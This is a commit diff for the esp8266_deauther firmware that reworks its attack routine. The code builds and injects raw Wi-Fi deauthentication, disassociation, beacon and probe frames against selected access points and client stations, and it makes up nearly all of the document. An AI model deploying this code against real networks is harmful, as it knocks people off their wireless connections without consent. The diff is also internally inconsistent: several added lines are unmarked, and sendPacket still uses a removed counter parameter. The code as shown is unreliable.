Improved attack routine

- less count() calls - fixed the deauth station crash (hopefully) - sort targets after channel for better performance - increment counter in deauth/beacon/probe function and not in sendPacket() that was stupid anyway
2025-12-16 11:39:58 +01:00 · 2018-03-25 10:26:55 +02:00
parent 7d26b0741f
commit e494d95c15
5 changed files with 82 additions and 44 deletions
--- a/esp8266_deauther/Attack.cpp
+++ b/esp8266_deauther/Attack.cpp
@@ -23,7 +23,8 @@ void Attack::start() {
  prntln(A_START);
  attackTime = currentTime;
  attackStartTime = currentTime;
-  //accesspoints.sortAfterChannel();
+  accesspoints.sortAfterChannel();
  stations.sortAfterChannel();
  running = true;
 }
@@ -41,6 +42,8 @@ void Attack::start(bool beacon, bool deauth, bool deauthAll, bool probe, bool ou
    start();
  } else {
    prntln(A_NO_MODE_ERROR);
    accesspoints.sort();
    stations.sort();
    stop();
  }
 }
@@ -131,6 +134,10 @@ String Attack::getStatusJSON() {
 void Attack::update() {
  if (!running || scan.isScanning()) return;
  apCount = accesspoints.count();
  stCount = stations.count();
  nCount = names.count();
  // run/update all attacks
  deauthUpdate();
  deauthAllUpdate();
@@ -150,28 +157,28 @@ void Attack::deauthUpdate() {
  if (!deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) {
    if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) {
      // APs
-      if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) {
+      if (apCount > 0 && deauth.tc < apCount) {
        if (accesspoints.getSelected(deauth.tc)) {
          deauth.tc += deauthAP(deauth.tc);
        } else deauth.tc++;
      }
      // Stations
-      else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) {
+      else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) {
-        if (stations.getSelected(deauth.tc - accesspoints.count())) {
+        if (stations.getSelected(deauth.tc - apCount)) {
-          deauth.tc += deauthStation(deauth.tc - accesspoints.count());
+          deauth.tc += deauthStation(deauth.tc - apCount);
        } else deauth.tc++;
      }
      // Names
-      else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < names.count() + stations.count() + accesspoints.count()) {
+      else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < nCount + stCount + apCount) {
-        if (names.getSelected(deauth.tc - stations.count() - accesspoints.count())) {
+        if (names.getSelected(deauth.tc - stCount - apCount)) {
-          deauth.tc += deauthName(deauth.tc - stations.count() - accesspoints.count());
+          deauth.tc += deauthName(deauth.tc - stCount - apCount);
        } else deauth.tc++;
      }
      // reset counter
-      if (deauth.tc >= names.count() + stations.count() + accesspoints.count())
+      if (deauth.tc >= nCount + stCount + apCount)
        deauth.tc = 0;
    }
  }
@@ -181,7 +188,7 @@ void Attack::deauthAllUpdate() {
  if (deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) {
    if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) {
      // APs
-      if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) {
+      if (apCount > 0 && deauth.tc < apCount) {
        tmpID = names.findID(accesspoints.getMac(deauth.tc));
        if (tmpID < 0) {
          deauth.tc += deauthAP(deauth.tc);
@@ -191,24 +198,24 @@ void Attack::deauthAllUpdate() {
      }
      // Stations
-      else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) {
+      else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) {
-        tmpID = names.findID(stations.getMac(deauth.tc - accesspoints.count()));
+        tmpID = names.findID(stations.getMac(deauth.tc - apCount));
        if (tmpID < 0) {
-          deauth.tc += deauthStation(deauth.tc - accesspoints.count());
+          deauth.tc += deauthStation(deauth.tc - apCount);
        } else if (!names.getSelected(tmpID)) {
-          deauth.tc += deauthStation(deauth.tc - accesspoints.count());
+          deauth.tc += deauthStation(deauth.tc - apCount);
        } else deauth.tc++;
      }
      // Names
-      else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < accesspoints.count() + stations.count() + names.count()) {
+      else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < apCount + stCount + nCount) {
-        if (!names.getSelected(deauth.tc - accesspoints.count() - stations.count())) {
+        if (!names.getSelected(deauth.tc - apCount - stCount)) {
-          deauth.tc += deauthName(deauth.tc - accesspoints.count() - stations.count());
+          deauth.tc += deauthName(deauth.tc - apCount - stCount);
        } else deauth.tc++;
      }
      // reset counter
-      if (deauth.tc >= names.count() + stations.count() + accesspoints.count())
+      if (deauth.tc >= nCount + stCount + apCount)
        deauth.tc = 0;
    }
  }
@@ -233,15 +240,15 @@ void Attack:: beaconUpdate() {
  }
 }
-bool Attack::deauthStation(uint8_t num) {
+bool Attack::deauthStation(int num) {
  return deauthDevice(accesspoints.getMac(stations.getAP(num)), stations.getMac(num), settings.getDeauthReason(), accesspoints.getCh(stations.getAP(num)));
 }
-bool Attack::deauthAP(uint8_t num) {
+bool Attack::deauthAP(int num) {
  return deauthDevice(accesspoints.getMac(num), broadcast, settings.getDeauthReason(), accesspoints.getCh(num));
 }
-bool Attack::deauthName(uint8_t num) {
+bool Attack::deauthName(int num) {
  if (names.isStation(num)) {
    return deauthDevice(names.getBssid(num), names.getMac(num), settings.getDeauthReason(), names.getCh(num));
  } else {
@@ -253,7 +260,7 @@ bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_
  if (!stMac) return false; // exit when station mac is null
  //Serial.println("Deauthing "+macToStr(apMac)+" -> "+macToStr(stMac)); // for debugging
-
+  
  bool success = false;
  // build deauth packet
@@ -265,22 +272,36 @@ bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_
  // send deauth frame
  deauthPacket[0] = 0xc0;
-  if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets()))
+  if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
    success = true;
  // send disassociate frame
  deauthPacket[0] = 0xa0;
-  if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets()))
+  if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
    success = true;
-
+  
  // send another packet, this time from the station to the accesspoint
  if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast
-    if (deauthDevice(stMac, apMac, reason, ch)) {
+    // build deauth packet
    memcpy(&deauthPacket[4], apMac, 6);
    memcpy(&deauthPacket[10], stMac, 6);
    memcpy(&deauthPacket[16], stMac, 6);
    // send deauth frame
    deauthPacket[0] = 0xc0;
    if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
      success = true;
    // send disassociate frame
    deauthPacket[0] = 0xa0;
    if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
      success = true;
    }
  }
-  if (success) deauth.time = currentTime;
+  if (success){
    deauth.time = currentTime;
    deauth.packetCounter++;
  }
  return success;
 }
@@ -310,8 +331,9 @@ bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
  beaconPacket[82] = ch;
-  if (sendPacket(beaconPacket, packetSize, &beacon.packetCounter, ch, settings.getForcePackets())) {
+  if (sendPacket(beaconPacket, packetSize, ch, settings.getForcePackets())) {
    beacon.time = currentTime;
    beacon.packetCounter++;
    return true;
  }
@@ -332,30 +354,29 @@ bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) {
  memcpy(&probePacket[10], mac, 6);
  memcpy(&probePacket[26], ssid, ssidLen);
-  if (sendPacket(probePacket, packetSize, &probe.packetCounter, ch, settings.getForcePackets())) {
+  if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
    probe.time = currentTime;
    probe.packetCounter++;
    return true;
  }
  return false;
 }
-bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries) {
+bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries) {
  //Serial.println(bytesToStr(packet, packetSize));
  // set channel
  setWifiChannel(ch);
-
+  
  // sent out packet
  bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
-
+  
  // try again until it's sent out
  for (int i = 0; i < tries && !sent; i++) {
    yield();
    sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
  }
  if (sent) (*packetCounter)++;
  return sent;
 }
--- a/esp8266_deauther/Attack.h
+++ b/esp8266_deauther/Attack.h
@@ -42,9 +42,9 @@ class Attack {
    void status();
    String getStatusJSON();
-    bool deauthAP(uint8_t num);
+    bool deauthAP(int num);
-    bool deauthStation(uint8_t num);
+    bool deauthStation(int num);
-    bool deauthName(uint8_t num);
+    bool deauthName(int num);
    bool deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch);
    bool sendBeacon(uint8_t tc);
@@ -53,7 +53,7 @@ class Attack {
    bool sendProbe(uint8_t tc);
    bool sendProbe(uint8_t* mac, const char* ssid, uint8_t ch);
-    bool sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries);
+    bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries);
    bool isRunning();
@@ -90,13 +90,17 @@ class Attack {
    uint32_t deauthPkts = 0;
    uint32_t beaconPkts = 0;
    uint32_t probePkts = 0;
-    
+
-    int8_t tmpID;
+    uint8_t apCount = 0;
    uint8_t stCount = 0;
    uint8_t nCount = 0;
    int8_t tmpID = -1;
    uint16_t packetSize = 0;
    uint32_t attackTime = 0; // for counting how many packets per second
    uint32_t attackStartTime = 0;
-    uint32_t timeout;
+    uint32_t timeout = 0;
    // random mac address for making the beacon packets
    uint8_t mac[6] = {0xAA,0xBB,0xCC,0x00,0x11,0x22};
--- a/esp8266_deauther/SerialInterface.cpp
+++ b/esp8266_deauther/SerialInterface.cpp
@@ -889,8 +889,12 @@ void SerialInterface::runCommand(String input) {
    for (int i = 0; i < packetSize; i++)
      packet[i] = strtoul((packetStr.substring(i * 2, i * 2 + 2)).c_str(), NULL, 16);
-    if (attack.sendPacket(packet, packetSize, &counter, wifi_channel, 10)) prntln(CLI_CUSTOM_SENT);
+    if (attack.sendPacket(packet, packetSize, wifi_channel, 10)){
-    else prntln(CLI_CUSTOM_FAILED);
+      prntln(CLI_CUSTOM_SENT);
      counter++;
    } else{
      prntln(CLI_CUSTOM_FAILED);
    }
  }
  // ===== LED ===== //
--- a/esp8266_deauther/Stations.cpp
+++ b/esp8266_deauther/Stations.cpp
@@ -35,6 +35,14 @@ void Stations::sort() {
  });
 }
 void Stations::sortAfterChannel() {
  list->sort([](Station & a, Station & b) -> int{
    if (a.ch == b.ch) return 0;
    if (a.ch < b.ch) return -1;
    if (a.ch > b.ch) return 1;
  });
 }
 void Stations::removeAll() {
  internal_removeAll();
  prntln(ST_CLEARED_LIST);
--- a/esp8266_deauther/Stations.h
+++ b/esp8266_deauther/Stations.h
@@ -27,6 +27,7 @@ class Stations {
    Stations();
    void sort();
    void sortAfterChannel();
    void select(int num);
    void deselect(int num);